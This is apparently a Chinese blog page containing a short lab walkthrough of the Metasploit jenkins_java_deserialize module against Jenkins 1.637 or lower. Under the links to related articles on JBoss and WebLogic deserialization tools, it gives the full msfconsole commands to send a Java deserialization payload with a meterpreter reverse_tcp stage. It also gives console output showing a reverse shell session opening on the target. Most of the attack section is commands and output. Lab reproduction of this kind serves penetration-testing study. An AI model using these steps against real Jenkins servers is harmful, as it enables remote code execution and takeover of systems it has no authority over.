Metasploit - jenkins_java_deserialize

最新推荐文章于 2024-08-06 22:22:16 发布
最新推荐文章于 2024-08-06 22:22:16 发布
阅读量1.4k 收藏
点赞数
分类专栏: Pentesting Vulnerability Analysis Metasploit

Standup a Jenkins server version 1.637 or lower:

wget http://mirrors.jenkins-ci.org/war/1.637/jenkins.war
java -jar jenkins.war

Run the following exploit in msfconsole:

use exploit/linux/misc/jenkins_java_deserialize
set payload java/meterpreter/reverse_tcp
set RHOST 127.0.0.1
set RPORT 8080
set LHOST <UR-HOST>
set LPORT 4444
exploit

Ensure you get a shell

msf exploit(jenkins_java_deserialize) > show options 

Module options (exploit/linux/misc/jenkins_java_deserialize):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.104    yes       The target address
   RPORT  8080             yes       The target port
   TEMP   /tmp             yes       Folder to write the payload to


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.108    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Jenkins 1.637


msf exploit(jenkins_java_deserialize) > run 

[*] Started reverse handler on 192.168.1.108:4444 
[*] 192.168.1.104:8080 - Sending headers...
[*] 192.168.1.104:8080 - Sending payload length: 13198
[*] 192.168.1.104:8080 - Sending headers...
[*] 192.168.1.104:8080 - Sending payload length: 6770
[*] Sending stage (45741 bytes) to 192.168.1.104
[*] Meterpreter session 1 opened (192.168.1.108:4444 -> 192.168.1.104:56753) at 2015-12-12 05:00:25 +0000
[+] Deleted /tmp/WUoykkU.jar

meterpreter > sysinfo 
Computer    : lab
OS          : Linux 4.0.0-kali1-686-pae (i386)
Meterpreter : java/java
meterpreter >

References

https://github.com/rapid7/metasploit-framework/pull/6338

Nixawk
关注
专栏目录
jboss --- 漏洞复现ysoserial工具
代码审计
04-27 1286
这里写目录标题 ssh 代理转发 访问物理机中的3388端口 就相当于访问虚拟机bihuo java中的 3389端口
metasploit-framework_6.1.2+20210821102555_1rapid7-1_amd64.deb
08-22
我希望能方便到你 网站原地址:https://apt.metasploit.com/ k
DeserializeExploit.7z
10-13
jboss 反序列化工具
Metasploit - Jenkins
Nixawk
12-10 1041
msf auxiliary(jenkins_enum) > show options Module options (auxiliary/scanner/http/jenkins_enum): Name Current Setting Required Description ---- --------------- -------- -----------
【Jboss】常见漏洞复现
最新发布
m0_59151303的博客
08-06 1143
JBoss是一个基于J2EE的开发源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。
[EXP]Jenkins 2.150.2 - Remote Command Execution (Metasploit)
weixin_30539835的博客
03-14 347
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf...
jenkins漏洞集合
SHELLCODE_8BIT的博客
03-01 4662
复现文章和脚本大都是网上收集,大部分能找到出处的,个别找不到明确的地址。
07-SCADA_Metasploit_Modules.xlsx
10-10
Metasploit中工控设备的攻击模块清单
PentestBox-with-Metasploit-v2.2(1).zip
02-02
PentestBox-with-Metasploit-v2.2
metasploit-framework-master.zip
09-08
"metasploit-framework-master.zip" 是这个框架的源代码压缩包,包含了完整的开发环境和工具集合。 **Metasploit框架的核心组件** 1. **Payloads(有效载荷)**:有效载荷是攻击的核心部分,它们在目标系统上执行...
Java反序列化终极检测工具_Jboss & Weblogic & Websphere.zip
09-05
Java反序列化终极检测工具_Jboss & Weblogic & Websphere.zip Java反序列化终极检测工具_Jboss & Weblogic & Websphere.zip
java反序列化漏洞利用工具WebLogicExploit
01-14
使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布的代码执行、反弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试中,稍后加入
java反序列化工具ysoserial.jar浅析
谢公子的博客
07-19 8829
ysoserial.jar ysoserial是集合了各种java反序列化payload的工具,项目地址:https://github.com/frohoff/ysoserial
jenkins 漏洞集合 简介
热门推荐
whatday的专栏
06-04 1万+
目录 CVE-2015-8103 反序列化远程代码执行 CVE-2016-0788 Jenkins CI和LTS 远程代码执行漏洞 CVE-2016-0792 低权限用户命令执行 CVE-2016-9299 代码执行 CVE-2017-1000353 Jenkins-CI 远程代码执行 CVE-2018-1000110 用户枚举 CVE-2018-1000861 远程命令执行 CVE-2018-1999002 任意文件读取 CVE-2018-1000600 Jenkins GitHub 信
Metasploit 渗透测试手册第三版 第三章 服务端漏洞利用(翻译)
weixin_34189116的博客
04-29 3268
第三章 服务端漏洞利用 在本章中,我们将学习以下内容 1、攻击Linux服务器 2、SQL注入攻击 3、shell类型 4、攻击Windows服务器 5、利用公用服务 6、MS17-010 永恒之蓝 SMB远程代码执行Windows内核破坏 7、MS17-010 EternalRomance/EternalSynergy/EternalChampion 8、植入后门 9、拒绝服务攻击 简介 在第二...
Java反序列化漏洞分析
abg49988的博客
10-15 1398
相关学习资料   http://www.freebuf.com/vuls/90840.html   https://security.tencent.com/index.php/blog/msg/97   http://www.tuicool.com/articles/ZvMbIne   http://www.freebuf.com/vuls/86566.html  ...
中间件漏洞 -- JBoss
weixin_44769042的博客
11-17 4460
中间件漏洞记录--5 jBoss是一个基于J2EE的开发源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。默认端口:8080,9990 目录 一、JBoss JMXInvokerServlet 反序列化漏洞 1、环境搭建:docker + vulh...
Misc
ypynetboy的专栏
01-15 291
JProfiler:JAVA内存泄露调试工具
Linux上用metasploit使用mysql_version模块怎么操作
05-26
使用 Metasploit 的 mysql_version 模块可以帮助你获取目标主机上正在运行的 MySQL 版本信息。下面是在 Linux 上使用 Metasploit 的 mysql_version 模块的步骤: 1. 打开终端并启动 Metasploit 控制台:`msfconsole...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值